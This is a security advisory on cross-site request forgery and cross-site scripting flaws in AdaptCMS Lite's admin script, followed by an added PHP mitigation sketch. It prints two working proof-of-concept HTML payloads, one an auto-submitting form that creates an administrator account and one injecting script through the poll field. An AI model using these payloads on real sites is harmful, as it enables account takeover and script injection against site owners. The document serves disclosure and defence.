Multiple vulnerabilities in AdaptCMS Lite

2010-04-07T00:00:00
ID HTB22346
Type htbridge
Reporter High-Tech Bridge
Modified 2010-04-07T00:00:00

Description

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in AdaptCMS Lite which could be exploited to perform cross-site request forgery and cross-site scripting attacks.

1) Cross-site request forgery (CSRF) in AdaptCMS Lite
The vulnerability exists due to insufficient validation of the request origin in the /admin.php script. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and gain complete control over the application.
Exploitation example:
<form action="http://host/admin.php?view=edit_users2&id=MY_ID" method="post">
<input type=hidden name=username1 value=test >
<input type=hidden name=password1 value=test >
<input type=hidden name=email1 value=test@example.com >
<input type=hidden name=level value=Admin >
</form>
<script>
document.forms[0].submit()
</script>

2) Cross-site scripting vulnerability (XSS) in AdaptCMS Lite
The vulnerability exists due to an input validation error in the HTTP POST "poll" parameter in /admin.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and scripting code in the user's browser in the context of the vulnerable website.
Exploitation example:
<form action='http://host/admin.php?view=edit_poll2' method='post' >
<input type='text' name='poll' size='25' value='new text?"><script>alert()</script>'>
<input type='checkbox' name='multiple' value='yes'>
<input type='checkbox' name='custom' value='yes'>
<input type='hidden' name='id' value='1'><input type='hidden' name='oldpoll' value='old text'>
<input type='submit' value='Update Poll' >
</form>
<script>
document.forms[0].submit()
</script>
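
Mitigation sketch for both issues above, as an added example that is not part of the original advisory and not AdaptCMS code: a per-session anti-CSRF token checked on every state-changing POST, and output encoding of the "poll" value. All function names and the csrf_token field are hypothetical, and it assumes the poll text is echoed back into a quoted HTML attribute.

```php
<?php
declare(strict_types=1);
// Hypothetical helpers for an admin script; none of these names come from AdaptCMS.

/** Return the per-session CSRF token, creating it on first use. */
function csrf_token(): string
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

/** Constant-time comparison of the submitted token with the session token. */
function csrf_valid($submitted): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    return is_string($submitted) && $expected !== '' && hash_equals($expected, $submitted);
}

/** Reject any state-changing request that is not a POST carrying a valid token. */
function require_csrf(): void
{
    csrf_token(); // ensures the session is started and a token exists
    if (($_SERVER['REQUEST_METHOD'] ?? '') !== 'POST' || !csrf_valid($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token');
    }
}

/** Encode a value for an HTML text node or a quoted attribute. */
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Render the edit-poll form with the token embedded and the poll text encoded. */
function render_poll_form(int $id, string $poll): string
{
    return '<form action="admin.php?view=edit_poll2" method="post">'
        . '<input type="hidden" name="csrf_token" value="' . h(csrf_token()) . '">'
        . '<input type="hidden" name="id" value="' . $id . '">'
        . '<input type="text" name="poll" size="25" value="' . h($poll) . '">'
        . '<input type="submit" value="Update Poll"></form>';
}
```

Calling require_csrf() before handling views such as edit_users2 and edit_poll2 makes a cross-site auto-submitted form fail with 403, because the attacker's page cannot read the token stored in the administrator's session.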